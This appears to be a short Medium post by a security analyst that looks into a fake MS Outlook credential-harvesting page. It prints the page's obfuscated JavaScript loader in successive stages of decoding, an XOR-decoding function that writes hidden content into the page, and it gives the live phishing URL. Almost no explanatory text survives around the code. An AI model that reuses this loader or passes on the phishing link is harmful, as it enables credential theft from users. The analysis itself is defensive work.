SPAM or Disguised MS Outlook?— Credentials Harvester

document.write(unescape("%3Chtml%3E%0A%3Chead%3E%0A%3C/head%3E%0A%3Cbody%3E%0A%0A%3Cscript%20type%3D%22text/javascript%22%3E%0A%3C%21--%20%0Aeval%28unescape%28%27%2566%2575%256e%2563%2574%2569%256f%256e%2520%2566%2539%2539%2563%2531%2534%2566%2528%2573%2529%2520%257b%250a%2509%2576%2561%2572%2520%2572%2520%253d%2520%2522%2522%253b%250a%2509%2576%2561%2572%2520%2574%256d%2570%2520%253d%2520%2573%252e%2573%2570%256c%2569%2574%2528%2522%2539%2538%2538%2530%2539%2536%2535%2522%2529%253b%250a%2509%2573%2520%253d%2520%2575%256e%2565%2573%2563%2561%2570%2565%2528%2574%256d%2570%255b%2530%255d%2529%253b%250a%2509%256b%2520%253d%2520%2575%256e%2565%2573%2563%2561%2570%2565%2528%2574%256d%2570%255b%2531%255d%2520%252b%2520%2522%2536%2532%2533%2533%2533%2530%2522%2529%253b%250a%2509%2566%256f%2572%2528%2520%2576%2561%2572%2520%2569%2520%253d%2520%2530%253b%2520%2569%2520%253c%2520%2573%252e%256c%2565%256e%2567%2574%2568%253b%2520%2569%252b%252b%2529%2520%257b%250a%2509%2509%2572%2520%252b%253d%2520%2553%2574%2572%2569%256e%2567%252e%2566%2572%256f%256d%2543%2568%2561%2572%2543%256f%2564%2565%2528%2528%2570%2561%2572%2573%2565%2549%256e%2574%2528%256b%252e%2563%2568%2561%2572%2541%2574%2528%2569%2525%256b%252e%256c%2565%256e%2567%2574%2568%2529%2529%255e%2573%252e%2563%2568%2561%2572%2543%256f%2564%2565%2541%2574%2528%2569%2529%2529%252b%2534%2529%253b%250a%2509%257d%250a%2509%2572%2565%2574%2575%2572%256e%2520%2572%253b%250a%257d%250a%27%29%29%3B%0Aeval%28unescape%28%27%2564%256f%2563%2575%256d%2565%256e%2574%252e%2577%2572%2569%2574%2565%2528%2566%2539%2539%2563%2531%2534%2566%2528%2527%27%29%20+%20%27%253b%2560%256e%2566%2560%251b%2554%2559%2572%2566%2568%2569%2539%251d%2566%2575%2578%2565%2568%253f%252d%2529%2570%2566%2569%256f%2568%2560%2575%2567%2562%256f%2578%2576%2567%2568%2569%256c%252a%2577%2577%2573%2523%2526%2535%253c%252a%2530%2532%255c%256f%252c%2531%2533%255a%2564%2566%252b%2526%2534%2563%256c%256c%2528%255e%2562%2562%256e%2557%2524%252b%2527%2533%252c%252f%2531%2532%255f%256f%256d%2529%2527%253b%252c%2569%2573%256c%2562%256c%252c%2531%2537%2563%2563%2568%2522%256c%2556%2567%255f%2569%2571%2562%256e%256c%2567%256e%2562%2527%252b%2527%252b%2529%256c%255e%2572%255f%2562%2528%2569%256c%2565%2519%2515%256f%2563%2573%2567%2568%2560%253a%251c%2549%2543%2546%2557%2517%251a%2568%255e%256a%2562%2539%251d%256a%256e%256b%2562%256d%254b%256d%256c%256a%251d%251f%2541%2549%253d%2555%255d%2545%2546%2530%2518%255f%256f%256f%256b%2565%255c%255f%2575%256d%2562%256d%2522%2572%252b%2570%2570%2570%2529%2561%2569%256b%2561%2520%2576%2567%256e%2563%2569%255c%2568%2560%2562%2562%251b%2514%2554%2576%2579%256d%255d%2568%256a%256f%2568%2562%2572%2564%2531%2517%256c%256b%2564%251c%25399880965%2533%2532%2535%2538%2539%2537%2539%27%20+%20unescape%28%27%2527%2529%2529%253b%27%29%29%3B%0A//%20--%3E%0A%3C/script%3E%0A%3Cnoscript%3E%3Ci%3EJavascript%20required%3C/i%3E%3C/noscript%3E%0A%0A%3C/html%3E%0A%0A"));
document.write(unescape("<html>
<head>
</head>
<body>
<script type="text/javascript">
<!--
eval(unescape('%66%75%6e%63%74%69%6f%6e%20%66%39%39%63%31%34%66%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%39%38%38%30%39%36%35%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%36%32%33%33%33%30%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%34%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%39%39%63%31%34%66%28%27') '%3b%60%6e%66%60%1b%54%59%72%66%68%69%39%1d%66%75%78%65%68%3f%2d%29%70%66%69%6f%68%60%75%67%62%6f%78%76%67%68%69%6c%2a%77%77%73%23%26%35%3c%2a%30%32%5c%6f%2c%31%33%5a%64%66%2b%26%34%63%6c%6c%28%5e%62%62%6e%57%24%2b%27%33%2c%2f%31%32%5f%6f%6d%29%27%3b%2c%69%73%6c%62%6c%2c%31%37%63%63%68%22%6c%56%67%5f%69%71%62%6e%6c%67%6e%62%27%2b%27%2b%29%6c%5e%72%5f%62%28%69%6c%65%19%15%6f%63%73%67%68%60%3a%1c%49%43%46%57%17%1a%68%5e%6a%62%39%1d%6a%6e%6b%62%6d%4b%6d%6c%6a%1d%1f%41%49%3d%55%5d%45%46%30%18%5f%6f%6f%6b%65%5c%5f%75%6d%62%6d%22%72%2b%70%70%70%29%61%69%6b%61%20%76%67%6e%63%69%5c%68%60%62%62%1b%14%54%76%79%6d%5d%68%6a%6f%68%62%72%64%31%17%6c%6b%64%1c%399880965%33%32%35%38%39%37%39' unescape('%27%29%29%3b'));
// -->
</script>
<noscript><i>Javascript required</i></noscript>
</html>"));
document.write(unescape("<html>
<head>
</head>
<body>
<script type="text/javascript">
<!--
eval(unescape('function f99c14f(s) {
var r = "";
var tmp = s.split("9880965");
s = unescape(tmp[0]);
k = unescape(tmp[1] + "623330");
for( var i = 0; i < s.length; i++) {
r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+4);
}
return r;
}
'));
eval(unescape('document.write(f99c14f('') ';`nf`TYrfhi9fuxeh?-)pfioh`ugboxvghil*wws#&5<*02\o,13Zdf+&4cll(^bbnW$+'3,/12_om)';,islbl,17cch"lVg_iqbnlgnb'+'+)l^r_b(ileocsgh`:ICFWh^jb9jnkbmKmljAI=U]EF0_ooke\_umbm"r+ppp)aika vgnci\h`bbTvym]hjohbrd1lkd998809653258979' unescape(''));'));
// -->
</script>
<noscript><i>Javascript required</i></noscript>
</html>"));
https://emaildelivery-fixed.web.app/

Conclusion

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Kamran Saifullah

Kamran Saifullah

Malware/RE/Firmware Analysis, App Sec/Off Sec, VAPT, Phishing Simulations/SE | Risk Management, IS Governance, Audits, ISO 27001 LI